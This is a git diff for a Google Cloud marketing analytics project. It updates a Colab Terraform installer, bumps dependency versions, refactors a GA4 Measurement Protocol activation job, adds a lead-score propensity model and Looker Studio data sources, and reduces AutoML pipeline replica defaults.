"hmdklTTuQ_9d", + "cellView": "form" + }, + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "markdown", + "source": [ + "### 5. Run Installation\n", + "\n", + "Click the ( β–Ά ) button to run the installation end-to-end.\n", + "After clicking the button, expand this section to observe that all cells have successfully executed without issues.\n", + "\n", + "***Time: 25-30 minutes.***" + ], + "metadata": { + "id": "US36yJ8lmqnP" + } + }, + { + "cell_type": "code", + "source": [ + "# @title\n", + "%%capture\n", + "%%bash\n", + "export PATH=\"$PATH:~/.tfenv/bin\"\n", + "export GOOGLE_APPLICATION_CREDENTIALS=/content/.config/application_default_credentials.json\n", + "TERRAFORM_RUN_DIR=$(pwd)/infrastructure/terraform\n", + "terraform -chdir=\"${TERRAFORM_RUN_DIR}\" init" + ], + "metadata": { + "id": "5UIbC_z9bgy4", + "cellView": "form" + }, + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "code", + "source": [ + "# @title\n", + "%%capture\n", + "%%bash\n", + "export PATH=\"$PATH:~/.tfenv/bin\"\n", + "export PATH=\"/root/.local/bin:$PATH\"\n", + "export PATH=\"$PATH:$(which gcloud)\"\n", + "export GOOGLE_APPLICATION_CREDENTIALS=/content/.config/application_default_credentials.json\n", + "TERRAFORM_RUN_DIR=$(pwd)/infrastructure/terraform\n", + "terraform -chdir=\"${TERRAFORM_RUN_DIR}\" apply -target=module.data_store -auto-approve" + ], + "metadata": { + "id": "BGteib5ebsA-", + "cellView": "form" + }, + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "code", + "source": [ + "# @title\n", + "#%%capture\n", + "%%bash\n", + "export PATH=\"$PATH:~/.tfenv/bin\"\n", + "export PATH=\"/root/.local/bin:$PATH\"\n", + "export PATH=\"$PATH:$(which gcloud)\"\n", + "export GOOGLE_APPLICATION_CREDENTIALS=/content/.config/application_default_credentials.json\n", + "TERRAFORM_RUN_DIR=$(pwd)/infrastructure/terraform\n", + "terraform -chdir=\"${TERRAFORM_RUN_DIR}\" apply -target=module.feature_store -auto-approve" + ], + "metadata": { + "cellView": "form", + "id": "dwD5DRRM2Ryl" + }, + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "code", + "source": [ + "# @title\n", + "%%capture\n", + "%%bash\n", + "export PATH=\"$PATH:~/.tfenv/bin\"\n", + "export PATH=\"/root/.local/bin:$PATH\"\n", + "export PATH=\"$PATH:$(which gcloud)\"\n", + "export GOOGLE_APPLICATION_CREDENTIALS=/content/.config/application_default_credentials.json\n", + "TERRAFORM_RUN_DIR=$(pwd)/infrastructure/terraform\n", + "terraform -chdir=\"${TERRAFORM_RUN_DIR}\" apply -target=module.pipelines -auto-approve" + ], + "metadata": { + "cellView": "form", + "id": "KrEr1yXS1_oA" + }, + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "code", + "source": [ + "# @title\n", + "%%capture\n", + "%%bash\n", + "export PATH=\"$PATH:~/.tfenv/bin\"\n", + "export PATH=\"/root/.local/bin:$PATH\"\n", + "export PATH=\"$PATH:$(which gcloud)\"\n", + "export GOOGLE_APPLICATION_CREDENTIALS=/content/.config/application_default_credentials.json\n", + "TERRAFORM_RUN_DIR=$(pwd)/infrastructure/terraform\n", + "terraform -chdir=\"${TERRAFORM_RUN_DIR}\" apply -target=module.activation -auto-approve" + ], + "metadata": { + "collapsed": true, + "cellView": "form", + "id": "7-Qr46vR2bLl" + }, + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "code", + "source": [ + "# @title\n", + "%%capture\n", + "%%bash\n", + "export PATH=\"$PATH:~/.tfenv/bin\"\n", + "export PATH=\"/root/.local/bin:$PATH\"\n", + "export PATH=\"$PATH:$(which gcloud)\"\n", + "export GOOGLE_APPLICATION_CREDENTIALS=/content/.config/application_default_credentials.json\n", + "TERRAFORM_RUN_DIR=$(pwd)/infrastructure/terraform\n", + "terraform -chdir=\"${TERRAFORM_RUN_DIR}\" apply -target=module.monitoring -auto-approve" + ], + "metadata": { + "collapsed": true, + "cellView": "form", + "id": "ElOBpEV3Mtbc" + }, + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "code", + "source": [ + "# @title\n", + "%%capture\n", + "%%bash\n", + "export PATH=\"$PATH:~/.tfenv/bin\"\n", + "export PATH=\"/root/.local/bin:$PATH\"\n", + "export PATH=\"$PATH:$(which gcloud)\"\n", + "export GOOGLE_APPLICATION_CREDENTIALS=/content/.config/application_default_credentials.json\n", + "TERRAFORM_RUN_DIR=$(pwd)/infrastructure/terraform\n", + "terraform -chdir=\"${TERRAFORM_RUN_DIR}\" apply -auto-approve" + ], + "metadata": { + "cellView": "form", + "id": "eyZNdewu2zQI" + }, + "execution_count": null, + "outputs": [] + }, + { + "cell_type": "code", + "source": [ + "# @title\n", + "print(\"SUCCESS!\")" + ], + "metadata": { + "id": "1h7k6jFYpLPO", + "colab": { + "base_uri": "https://localhost:8080/" + }, + "outputId": "266267e5-ac12-4621-ec7f-19e051027edb" + }, + "execution_count": null, + "outputs": [ + { + "output_type": "stream", + "name": "stdout", + "text": [ + "SUCCESS!\n" + ] + } + ] + } + ] +} \ No newline at end of file diff --git a/pyproject.toml b/pyproject.toml index 3e0abe24..01eaf8aa 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -12,6 +12,15 @@ # See the License for the specific language governing permissions and # limitations under the License. +[project] +name = "marketing-analytics-jumpstart" +version = "1.0.0" +description = "Marketing Analytics Jumpstart" +authors = [{name = "Marketing Analytics Solutions Architects", email = "ma-se@google.com"}] +license = "Apache 2.0" +readme = "README.md" +requires-python = ">=3.9,<3.12.0" + [tool.poetry] name = "marketing-analytics-jumpstart" version = "1.0.0" @@ -22,49 +31,55 @@ readme = "README.md" packages = [{include = "python"}] [tool.poetry.dependencies] -python = ">=3.8,<3.11" -google-cloud-aiplatform = "1.52.0" +python = ">=3.9,<3.12.0" +#google-cloud-aiplatform = "1.52.0" +google-cloud-aiplatform = "1.77.0" shapely = "<2.0.0" google-cloud = "^0.34.0" jinja2 = ">=3.0.1,<4.0.0" -pip = "23.3" +pip = "23.3.2" invoke = "2.2.0" ## pyinvoke = "1.0.4" pre-commit = ">=2.14.1,<3.0.0" -pandas = "1.3.5" -google-cloud-bigquery = "2.30.0" +pandas = "1.5.3" +google-cloud-bigquery = "3.21.0" +google-cloud-bigquery-connection = "1.17.0" #google-cloud-pipeline-components = "1.0.33" google-cloud-pipeline-components = "2.6.0" google-auth = "^2.14.1" google-cloud-storage = "^2.6.0" +kfp = "2.4.0" ## Fixing this error: https://stackoverflow.com/questions/76175487/sudden-importerror-cannot-import-name-appengine-from-requests-packages-urlli -kfp = "2.0.0-rc.2" +#kfp = "2.0.0-rc.2" #kfp = {version = "2.0.0-b12", allow-prereleases = true} #kfp = {version = "2.0.0-b16", allow-prereleases = true} -kfp-server-api = "2.0.0-rc.1" +kfp-server-api = "2.0.5" +#kfp-server-api = "2.0.0-rc.1" #kfp-server-api = "2.0.0.a6" #kfp-server-api = "2.0.0b1" -urllib3 = "1.26.18" +urllib3 = "1.26.20" toml = "0.10.2" docker = "^6.0.1" -db-dtypes = "1.2.0" -optuna = "3.2.0" -scikit-learn = "1.2.2" +db-dtypes = "1.3.1" +optuna = "3.6.1" +scikit-learn = "1.5.0" #plotly = "5.16.0" #matplotlib= "3.7.2" #seaborn = "0.12.2" ma-components = {path = "python/base_component_image/", develop = true} -google-cloud-pubsub = "2.15.0" +google-cloud-pubsub = "2.27.2" #google-analytics-admin = "0.17.0" -google-analytics-admin = "0.22.7" +google-analytics-admin = "0.23.3" google-analytics-data = "^0.18.0" pyarrow = "15.0.2" google-auth-oauthlib = "^1.2.1" oauth2client = "^4.1.3" google-cloud-core = "^2.4.1" +sympy="1.13.3" +google-cloud-resource-manager="1.14.0" [tool.poetry.group.component_vertex.dependencies] -google-cloud-aiplatform = "1.52.0" +google-cloud-aiplatform = "1.77.0" shapely = "<2.0.0" toml = "0.10.2" @@ -72,16 +87,16 @@ toml = "0.10.2" ga4-setup = "python.ga4_setup.setup:entry" [tool.poetry.group.test.dependencies] -pytest = "7.0.0" -pytest-env = "0.6.2" -pytest-mock = "3.7.0" +pytest = "7.4.4" +pytest-env = "0.8.2" +pytest-mock = "3.14.0" pytest-variables = {extras = ["yaml"], version = "^2.0.0"} coverage = {extras = ["toml"], version = "^6.5.0"} pytest-cov = "^4.0.0" pytest-xdist = "^3.0.2" [tool.poetry.group.dev.dependencies] -pip = "23.3" +pip = "23.3.2" invoke = "2.2.0" pre-commit = ">=2.14.1,<3.0.0" black = "22.12.0" @@ -118,4 +133,7 @@ parallel = true [tool.coverage.report] fail_under = 70 show_missing = true -skip_empty= true \ No newline at end of file +skip_empty= true + +[tool.uv.workspace] +members = ["python/lookerstudio"] diff --git a/python/activation/main.py b/python/activation/main.py index 6bf3ff15..69c33785 100644 --- a/python/activation/main.py +++ b/python/activation/main.py @@ -62,6 +62,7 @@ def _add_argparse_args(cls, parser): - purchase-propensity-15-15 - purchase-propensity-15-7 - churn-propensity-30-15 + - lead-score-propensity-5-1 activation_type_configuration: The GCS path to the configuration file for all activation types. """ @@ -110,6 +111,7 @@ def _add_argparse_args(cls, parser): purchase-propensity-15-15 purchase-propensity-15-7 churn-propensity-30-15 + lead-score-propensity-5-1 ''', required=True ) @@ -330,7 +332,6 @@ class TransformToPayload(beam.DoFn): The DoFn takes the following arguments: - - template_str: The Jinja2 template string used to generate the Measurement Protocol payload. - event_name: The name of the event to be sent to Google Analytics 4. The DoFn yields the following output: @@ -338,33 +339,28 @@ class TransformToPayload(beam.DoFn): - A dictionary containing the Measurement Protocol payload. The DoFn performs the following steps: - 1. Removes bad shaping strings in the `client_id` field. - 2. Renders the Jinja2 template string using the provided data and event name. - 3. Converts the rendered template string into a JSON object. + 2. Converts the rendered template string into a JSON object. 4. Handles any JSON decoding errors. The DoFn is used to ensure that the Measurement Protocol payload is formatted correctly before being sent to Google Analytics 4. """ - def __init__(self, template_str, event_name): + def __init__(self, event_name): """ Initializes the DoFn. Args: - template_str: The Jinja2 template string used to generate the Measurement Protocol payload. event_name: The name of the event to be sent to Google Analytics 4. """ - self.template_str = template_str self.date_format = "%Y-%m-%d" self.date_time_format = "%Y-%m-%d %H:%M:%S.%f %Z" self.event_name = event_name - - - def setup(self): - """ - Sets up the Jinja2 environment. - """ - self.payload_template = Environment(loader=BaseLoader).from_string(self.template_str) + self.consent_obj = { + 'ad_user_data':'GRANTED', + 'ad_personalization':'GRANTED' + } + self.user_property_prefix = 'user_prop_' + self.event_parameter_prefix = 'event_param_' def process(self, element): @@ -384,21 +380,17 @@ def process(self, element): _client_id = element['client_id'].replace(r'', '') _client_id = element['client_id'].replace(r'q=">', '') - - payload_str = self.payload_template.render( - client_id=_client_id, - user_id=self.generate_user_id_key_value_pair(element), - event_timestamp=self.date_to_micro(element["inference_date"]), - event_name=self.event_name, - session_id=element['session_id'], - user_properties=self.generate_user_properties(element), - ) + result = {} - try: - result = json.loads(r'{}'.format(payload_str)) - except json.decoder.JSONDecodeError as e: - logging.error(payload_str) - logging.error(traceback.format_exc()) + result['client_id'] = _client_id + if element['user_id']: + result['user_id'] = element['user_id'] + result['timestamp_micros'] = self.date_to_micro(element["inference_date"]) + result['non_personalized_ads'] = False + result['consent'] = self.consent_obj + result['user_properties'] = self.extract_user_properties(element) + result['events'] = [self.extract_event(element)] + yield result @@ -419,62 +411,40 @@ def date_to_micro(self, date_str): return int(datetime.datetime.strptime(date_str, self.date_format).timestamp() * 1E6) - def generate_param_fields(self, element): + def extract_user_properties(self, element): """ - Generates a JSON string containing the parameter fields of the element. + Generates a dictionary containing the user properties of the element. Args: element: The element to be processed. Returns: - A JSON string containing the parameter fields of the element. + A dictionary containing the user properties of the element. """ - element_copy = element.copy() - del element_copy['client_id'] - del element_copy['user_id'] - del element_copy['session_id'] - del element_copy['inference_date'] - element_copy = {k: v for k, v in element_copy.items() if v} - return json.dumps(element_copy, cls=DecimalEncoder) + user_properties = {} + for k, v in element.items(): + if k.startswith(self.user_property_prefix) and v: + user_properties[k[len(self.user_property_prefix):]] = {'value': str(v)} + return user_properties - - def generate_user_properties(self, element): - """ - Generates a JSON string containing the user properties of the element. - - Args: - element: The element to be processed. - - Returns: - A JSON string containing the user properties of the element. + def extract_event(self, element): """ - element_copy = element.copy() - del element_copy['client_id'] - del element_copy['user_id'] - del element_copy['session_id'] - del element_copy['inference_date'] - user_properties_obj = {} - for k, v in element_copy.items(): - if v: - user_properties_obj[k] = {'value': str(v)} - return json.dumps(user_properties_obj, cls=DecimalEncoder) - + Generates a dictionary containing the event parameters from the element. - def generate_user_id_key_value_pair(self, element): - """ - If the user_id field is not empty generate the key/value string with the user_id. - else return empty string Args: element: The element to be processed. Returns: - A string containing the key and value with the user_id. + A dictionary containing the event parameters from the element. """ - user_id = element['user_id'] - if user_id: - return f'"user_id": "{user_id}",' - return "" - + event = { + 'name': self.event_name, + 'params': {} + } + for k, v in element.items(): + if k.startswith(self.event_parameter_prefix) and v: + event['params'][k[len(self.event_parameter_prefix):]] = v + return event @@ -519,8 +489,7 @@ def load_activation_type_configuration(args): # Create the activation type configuration dictionary. configuration = { 'activation_event_name': activation_config['activation_event_name'], - 'source_query_template': Environment(loader=BaseLoader).from_string(gcs_read_file(args.project, activation_config['source_query_template']).replace('\n', ' ')), - 'measurement_protocol_payload_template': gcs_read_file(args.project, activation_config['measurement_protocol_payload_template']) + 'source_query_template': Environment(loader=BaseLoader).from_string(gcs_read_file(args.project, activation_config['source_query_template']).replace('\n', ' ')) } return configuration @@ -589,7 +558,7 @@ def run(argv=None): query=load_from_source_query, use_json_exports=True, use_standard_sql=True) - | 'Prepare Measurement Protocol API payload' >> beam.ParDo(TransformToPayload(activation_type_configuration['measurement_protocol_payload_template'], activation_type_configuration['activation_event_name'])) + | 'Prepare Measurement Protocol API payload' >> beam.ParDo(TransformToPayload(activation_type_configuration['activation_event_name'])) | 'POST event to Measurement Protocol API' >> beam.ParDo(CallMeasurementProtocolAPI(activation_options.ga4_measurement_id, activation_options.ga4_api_secret, debug=activation_options.use_api_validation)) ) diff --git a/python/activation/requirements.txt b/python/activation/requirements.txt index 996c59a7..1809103f 100644 --- a/python/activation/requirements.txt +++ b/python/activation/requirements.txt @@ -1 +1 @@ -jinja2==3.1.4 +jinja2==3.1.5 diff --git a/python/base_component_image/Dockerfile b/python/base_component_image/Dockerfile index 1e555421..4ee0156b 100644 --- a/python/base_component_image/Dockerfile +++ b/python/base_component_image/Dockerfile @@ -12,7 +12,7 @@ # See the License for the specific language governing permissions and # limitations under the License. -FROM python:3.8.18-slim +FROM python:3.10.16-slim RUN pip install --upgrade pip RUN pip install poetry @@ -22,5 +22,5 @@ ENV PYTHONPATH=${PYTHONPATH}:${PWD} COPY ./pyproject.toml ./README.md /app/ COPY ./ma_components /app/ma_components -RUN poetry config virtualenvs.create false # so that installations is on global python3.7 and not in venv +RUN poetry config virtualenvs.create false # so that installations is on global python3.10 and not in venv RUN poetry install \ No newline at end of file diff --git a/python/base_component_image/pyproject.toml b/python/base_component_image/pyproject.toml index 3ce3fc2f..61352f50 100644 --- a/python/base_component_image/pyproject.toml +++ b/python/base_component_image/pyproject.toml @@ -2,32 +2,37 @@ name = "ma-components" version = "1.0.0" description = "contains components used in marketing analytics project. the need is to package the components and containerise so that they can be used from the python function based component" -authors = ["Christos Aniftos "] +authors = ["Marketing Analytics Solutions Architects "] +license = "Apache 2.0" readme = "README.md" packages = [{include = "ma_components"}] [tool.poetry.dependencies] -python = ">=3.8,<3.11" -pip = "23.3" +python = ">=3.9,<3.12.0" +pip = "23.3.2" +kfp = "2.4.0" ## Fixing this error: https://stackoverflow.com/questions/76175487/sudden-importerror-cannot-import-name-appengine-from-requests-packages-urlli -kfp = "2.0.0-rc.2" +#kfp = "2.0.0-rc.2" #kfp = {version = "2.0.0-b12", allow-prereleases = true} #kfp = {version = "2.0.0-b16", allow-prereleases = true} -kfp-server-api = "2.0.0-rc.1" +kfp-server-api = "2.0.5" +#kfp-server-api = "2.0.0-rc.1" #kfp-server-api = "2.0.0.a6" #kfp-server-api = "2.0.0b1" -urllib3 = "1.26.18" +urllib3 = "1.26.20" toml = "^0.10.2" docker = "^6.0.1" -google-cloud-bigquery = "2.30.0" -google-cloud-aiplatform = "1.52.0" +google-cloud-bigquery = "3.21.0" +google-cloud-bigquery-connection = "1.17.0" +#google-cloud-aiplatform = "1.52.0" +google-cloud-aiplatform = "1.77.0" shapely = "<2.0.0" -google-cloud-pubsub = "2.15.0" +google-cloud-pubsub = "2.27.2" #google-cloud-pipeline-components = "1.0.33" google-cloud-pipeline-components = "2.6.0" -db-dtypes = "1.2.0" -optuna = "3.2.0" -scikit-learn = "1.2.2" +db-dtypes = "1.3.1" +optuna = "3.6.1" +scikit-learn = "1.5.0" #plotly = "5.16.0" #matplotlib= "3.7.2" #seaborn = "0.12.2" @@ -35,6 +40,8 @@ pyarrow = "15.0.2" google-auth-oauthlib = "^1.2.1" oauth2client = "^4.1.3" google-cloud-core = "^2.4.1" +sympy="1.13.3" +google-cloud-resource-manager="1.14.0" [build-system] requires = ["poetry-core>=1.0.0"] diff --git a/python/function/trigger_activation/requirements.txt b/python/function/trigger_activation/requirements.txt index 1b6d3ebf..2c76e274 100644 --- a/python/function/trigger_activation/requirements.txt +++ b/python/function/trigger_activation/requirements.txt @@ -1,2 +1,2 @@ -functions-framework==3.7.0 -google-cloud-dataflow-client==0.8.10 \ No newline at end of file +functions-framework==3.8.2 +google-cloud-dataflow-client==0.8.15 \ No newline at end of file diff --git a/python/ga4_setup/setup.py b/python/ga4_setup/setup.py index 03204812..dd4c885d 100644 --- a/python/ga4_setup/setup.py +++ b/python/ga4_setup/setup.py @@ -276,6 +276,7 @@ def create_custom_dimensions(configuration: map): create_custom_dimensions_for('CLTV', ['cltv_decile'], existing_dimensions, configuration) create_custom_dimensions_for('Auto Audience Segmentation', ['a_a_s_prediction'], existing_dimensions, configuration) create_custom_dimensions_for('Churn Propensity', ['c_p_prediction', 'c_p_decile'], existing_dimensions, configuration) + create_custom_dimensions_for('Lead Score Propensity', ['l_s_p_prediction', 'l_s_p_decile'], existing_dimensions, configuration) @@ -513,9 +514,14 @@ def entry(): if args.ga4_resource == "check_property_type": property = get_property(configuration) - result = { - 'supported': f"{property.property_type == property.property_type.PROPERTY_TYPE_ORDINARY}" - } + is_property_supported = set((property.property_type.PROPERTY_TYPE_ORDINARY, property.property_type.PROPERTY_TYPE_SUBPROPERTY, property.property_type.PROPERTY_TYPE_ROLLUP)) + + result = {} + if property.property_type in is_property_supported: + result = {'supported': "True"} + else: + result = {'supported': "False"} + print(json.dumps(result)) # python setup.py --ga4_resource=custom_events diff --git a/python/lookerstudio/README.md b/python/lookerstudio/README.md index dc019f63..aa624b3f 100644 --- a/python/lookerstudio/README.md +++ b/python/lookerstudio/README.md @@ -1,5 +1,30 @@ # Marketing Analytics Jumpstart Looker Studio Dashboard +## Prerequisites +This Looker Studio dashboard relies on specific BigQuery tables that should be present in your project. These tables are created during the deployment of the Marketing Analytics Jumpstart and by the data processing pipelines of the solution. +Before deploying the dashboard, make sure the pre-requisite tables exist. If tables are missing, ensure the corresponding pipelines have run successfully. + +| Table | Dataset | Source Process | Troubleshooting Link | +| -------- | ------- | ------- | --------- | +| session_date | marketing_ga4_v1_* | Dataform Execution| [Workflow Execution Logs](https://console.cloud.google.com/bigquery/dataform/locations/us-central1/repositories/marketing-analytics/details/workflows) | +| session_device_daily_metrics | marketing_ga4_v1_* | Dataform Execution| [Workflow Execution Logs](https://console.cloud.google.com/bigquery/dataform/locations/us-central1/repositories/marketing-analytics/details/workflows) | +| latest | aggregated_predictions | feature-store terraform module and aggregated_predictions.aggregate_last_day_predictions stored procedure | [Aggregating stored prodedure](https://console.cloud.google.com/bigquery?ws=!1m5!1m4!6m3!1s!2saggregated_predictions!3saggregate_last_day_predictions) | +| resource_link | maj_dashboard | monitor terraform module | [Dashboard dataset](https://console.cloud.google.com/bigquery?ws=!1m4!1m3!3m2!1s!2smaj_dashboard) | +| dataform_googleapis_com_workflow_invocation_completion | maj_logs | monitor terraform module | [maj_logs dataset](https://console.cloud.google.com/bigquery?ws=!1m4!1m3!3m2!1s!2smaj_logs) | +| event | marketing_ga4_base_* | Dataform Execution | [Workflow Execution Logs](https://console.cloud.google.com/bigquery/dataform/locations/us-central1/repositories/marketing-analytics/details/workflows) | +| session_location_daily_metrics | marketing_ga4_v1_* | Dataform Execution | [Workflow Execution Logs](https://console.cloud.google.com/bigquery/dataform/locations/us-central1/repositories/marketing-analytics/details/workflows) | +| aggregated_value_based_bidding_volume_weekly | aggregated_vbb | feature-store terraform module and aggregated_vbb.invoke_aggregated_value_based_bidding_explanation_preparation stored procedure | [aggregated_value_based_bidding_explanation_preparation](https://console.cloud.google.com/bigquery?ws=!1m5!1m4!6m3!1s!2saggregated_vbb!3sinvoke_aggregated_value_based_bidding_explanation_preparation) | +| event_page | marketing_ga4_v1_* | Dataform Execution| [Workflow Execution Logs](https://console.cloud.google.com/bigquery/dataform/locations/us-central1/repositories/marketing-analytics/details/workflows) | +| unique_page_views | marketing_ga4_v1_* | Dataform Execution| [Workflow Execution Logs](https://console.cloud.google.com/bigquery/dataform/locations/us-central1/repositories/marketing-analytics/details/workflows) | +| aggregated_value_based_bidding_correlation | aggregated_vbb | feature-store terraform module and aggregated_vbb.invoke_aggregated_value_based_bidding_explanation_preparation stored procedure | [aggregated_value_based_bidding_explanation_preparation](https://console.cloud.google.com/bigquery?ws=!1m5!1m4!6m3!1s!2saggregated_vbb!3sinvoke_aggregated_value_based_bidding_explanation_preparation) | +| ad_performance_conversions | marketing_ads_v1_* | Dataform Execution | [Workflow Execution Logs](https://console.cloud.google.com/bigquery/dataform/locations/us-central1/repositories/marketing-analytics/details/workflows) | +| user_behaviour_revenue_insights_daily | gemini_insights | feature-store terraform module and gemini_insights.user_behaviour_revenue_insights stored procedure | [User Behaviour Revenue Insights](https://console.cloud.google.com/bigquery?ws=!1m5!1m4!6m3!1s!2sgemini_insights!3suser_behaviour_revenue_insights) | +| dataflow_googleapis_com_job_message | maj_logs | monitor terraform module | [maj_logs dataset](https://console.cloud.google.com/bigquery?ws=!1m4!1m3!3m2!1s!2smaj_logs) | +| vbb_weights | aggregated_vbb | feature-store terraform module and VBB explanation pipeline | [VBB Explanation Pipeline](https://console.cloud.google.com/vertex-ai/pipelines/schedules) | +| page_session_daily_metrics | marketing_ga4_v1_* | Dataform Execution| [Workflow Execution Logs](https://console.cloud.google.com/bigquery/dataform/locations/us-central1/repositories/marketing-analytics/details/workflows) | +| aiplatform_googleapis_com_pipeline_job_events | maj_logs | monitor terraform module | [maj_logs dataset](https://console.cloud.google.com/bigquery?ws=!1m4!1m3!3m2!1s!2smaj_logs) | +| aggregated_value_based_bidding_volume_daily | aggregated_vbb | feature-store terraform module and aggregated_vbb.invoke_aggregated_value_based_bidding_explanation_preparation stored procedure | [aggregated_value_based_bidding_explanation_preparation](https://console.cloud.google.com/bigquery?ws=!1m5!1m4!6m3!1s!2saggregated_vbb!3sinvoke_aggregated_value_based_bidding_explanation_preparation) | + ## Extract Looker Studio dashboard URL Extract the URL used to create the dashboard from the Terraform output value: diff --git a/python/lookerstudio/config.ini b/python/lookerstudio/config.ini index ed0c91d1..3c9d365b 100644 --- a/python/lookerstudio/config.ini +++ b/python/lookerstudio/config.ini @@ -33,15 +33,17 @@ [COMMON] # TODO: Replace the values in this section with your own -project = project_id +project = project_id ga4_dataset = marketing_ga4_v1_prod ga4_base_dataset = marketing_ga4_base_prod ads_dataset = marketing_ads_v1_prod +ads_base_dataset = marketing_ads_base_prod dashboard_dataset = maj_dashboard logs_dataset = maj_logs aggregated_vbb_dataset = aggregated_vbb aggregated_predictions_dataset = aggregated_predictions gemini_insights_dataset = gemini_insights +purchase_propensity_dataset = purchase_propensity # The below sections can be used as is unless you've used a custom dataset & view naming convention @@ -188,3 +190,19 @@ type = TABLE tableId = user_behaviour_revenue_insights_daily datasetId = ${COMMON:gemini_insights_dataset} projectId = ${COMMON:project} + +[Bid Strategy ROAS VBB] +ds_alias = Bid_strategy_roas_vbb +connector = bigQuery +type = TABLE +tableId = bid_strategy_roas +datasetId = ${COMMON:ads_base_dataset} +projectId = ${COMMON:project} + +[Prediction Stats] +ds_alias = Prediction_stats +connector = bigQuery +type = TABLE +tableId = prediction_stats +datasetId = ${COMMON:purchase_propensity_dataset} +projectId = ${COMMON:project} diff --git a/python/lookerstudio/lookerstudio_deployment.py b/python/lookerstudio/lookerstudio_deployment.py index 3e0c497c..59139fd1 100644 --- a/python/lookerstudio/lookerstudio_deployment.py +++ b/python/lookerstudio/lookerstudio_deployment.py @@ -28,7 +28,7 @@ # Constants -CONFIG_FILE = "config.ini" +CONFIG_FILE = "python/lookerstudio/config.ini" BASE_URL = "https://lookerstudio.google.com/reporting/create?" REPORT_ID = "f61f65fe-4991-45fc-bcdc-80593966f28c" REPORT_NAME = "Marketing%20Analytics%20Sample" diff --git a/python/lookerstudio/pyproject.toml b/python/lookerstudio/pyproject.toml index 12dbe21b..4bb61293 100644 --- a/python/lookerstudio/pyproject.toml +++ b/python/lookerstudio/pyproject.toml @@ -1,3 +1,11 @@ +[project] +name = "lookerstudio" +version = "0.1.0" +description = "Deployment process for the Marketing Analytics Jumpstart Looker Studio dashboard." +readme = "README.md" +requires-python = ">=3.7.1" +dependencies = [] + [tool.poetry] name = "looker studio deployment" version = "0.1.0" @@ -7,7 +15,7 @@ license = "Apache 2.0" readme = "README.md" [tool.poetry.dependencies] -python = ">=3.7.1" +python = ">=3.9" google-cloud-bigquery = "^3.10.0" google-auth = "^2.17.3" google-api-core = "^2.11.0" diff --git a/python/pipelines/automl_tabular_pl_v4.yaml b/python/pipelines/automl_tabular_pl_v4.yaml index 4d20b803..6bdc8cfb 100644 --- a/python/pipelines/automl_tabular_pl_v4.yaml +++ b/python/pipelines/automl_tabular_pl_v4.yaml @@ -11151,21 +11151,21 @@ root: isOptional: true parameterType: BOOLEAN distill_batch_predict_machine_type: - defaultValue: n1-standard-16 + defaultValue: n1-highmem-8 description: 'The prediction server machine type for batch predict component in the model distillation.' isOptional: true parameterType: STRING distill_batch_predict_max_replica_count: - defaultValue: 25.0 + defaultValue: 5.0 description: 'The max number of prediction server for batch predict component in the model distillation.' isOptional: true parameterType: NUMBER_INTEGER distill_batch_predict_starting_replica_count: - defaultValue: 25.0 + defaultValue: 5.0 description: 'The initial number of prediction server for batch predict component in the model distillation.' @@ -11201,14 +11201,14 @@ root: isOptional: true parameterType: STRING evaluation_batch_explain_max_replica_count: - defaultValue: 10.0 + defaultValue: 5.0 description: 'The max number of prediction server for batch explain components during evaluation.' isOptional: true parameterType: NUMBER_INTEGER evaluation_batch_explain_starting_replica_count: - defaultValue: 10.0 + defaultValue: 5.0 description: 'The initial number of prediction server for batch explain components during evaluation.' @@ -11222,14 +11222,14 @@ root: isOptional: true parameterType: STRING evaluation_batch_predict_max_replica_count: - defaultValue: 20.0 + defaultValue: 5.0 description: 'The max number of prediction server for batch predict components during evaluation.' isOptional: true parameterType: NUMBER_INTEGER evaluation_batch_predict_starting_replica_count: - defaultValue: 20.0 + defaultValue: 5.0 description: 'The initial number of prediction server for batch predict components during evaluation.' @@ -11279,7 +11279,7 @@ root: description: The GCP region that runs the pipeline components. parameterType: STRING max_selected_features: - defaultValue: 1000.0 + defaultValue: 100.0 description: number of features to select for training. isOptional: true parameterType: NUMBER_INTEGER @@ -11356,7 +11356,7 @@ root: isOptional: true parameterType: BOOLEAN stage_1_num_parallel_trials: - defaultValue: 35.0 + defaultValue: 5.0 description: Number of parallel trails for stage 1. isOptional: true parameterType: NUMBER_INTEGER @@ -11367,7 +11367,7 @@ root: isOptional: true parameterType: LIST stage_2_num_parallel_trials: - defaultValue: 35.0 + defaultValue: 5.0 description: Number of parallel trails for stage 2. isOptional: true parameterType: NUMBER_INTEGER diff --git a/python/pipelines/compiler.py b/python/pipelines/compiler.py index 6b5224dd..97bbc62c 100644 --- a/python/pipelines/compiler.py +++ b/python/pipelines/compiler.py @@ -31,6 +31,7 @@ 'vertex_ai.pipelines.feature-creation-purchase-propensity.execution': "pipelines.feature_engineering_pipelines.purchase_propensity_feature_engineering_pipeline", 'vertex_ai.pipelines.feature-creation-churn-propensity.execution': "pipelines.feature_engineering_pipelines.churn_propensity_feature_engineering_pipeline", 'vertex_ai.pipelines.feature-creation-customer-ltv.execution': "pipelines.feature_engineering_pipelines.customer_lifetime_value_feature_engineering_pipeline", + 'vertex_ai.pipelines.feature-creation-lead-score-propensity.execution': "pipelines.feature_engineering_pipelines.lead_score_propensity_feature_engineering_pipeline", 'vertex_ai.pipelines.auto_segmentation.training': "pipelines.auto_segmentation_pipelines.training_pl", 'vertex_ai.pipelines.auto_segmentation.prediction': "pipelines.auto_segmentation_pipelines.prediction_pl", 'vertex_ai.pipelines.segmentation.training': "pipelines.segmentation_pipelines.training_pl", @@ -39,6 +40,8 @@ 'vertex_ai.pipelines.purchase_propensity.prediction': "pipelines.tabular_pipelines.prediction_binary_classification_pl", 'vertex_ai.pipelines.churn_propensity.training': None, # tabular workflows pipelines is precompiled 'vertex_ai.pipelines.churn_propensity.prediction': "pipelines.tabular_pipelines.prediction_binary_classification_pl", + 'vertex_ai.pipelines.lead_score_propensity.training': None, # tabular workflows pipelines is precompiled + 'vertex_ai.pipelines.lead_score_propensity.prediction': "pipelines.tabular_pipelines.prediction_binary_classification_pl", 'vertex_ai.pipelines.propensity_clv.training': None, # tabular workflows pipelines is precompiled 'vertex_ai.pipelines.clv.training': None, # tabular workflows pipelines is precompiled 'vertex_ai.pipelines.clv.prediction': "pipelines.tabular_pipelines.prediction_binary_classification_regression_pl", diff --git 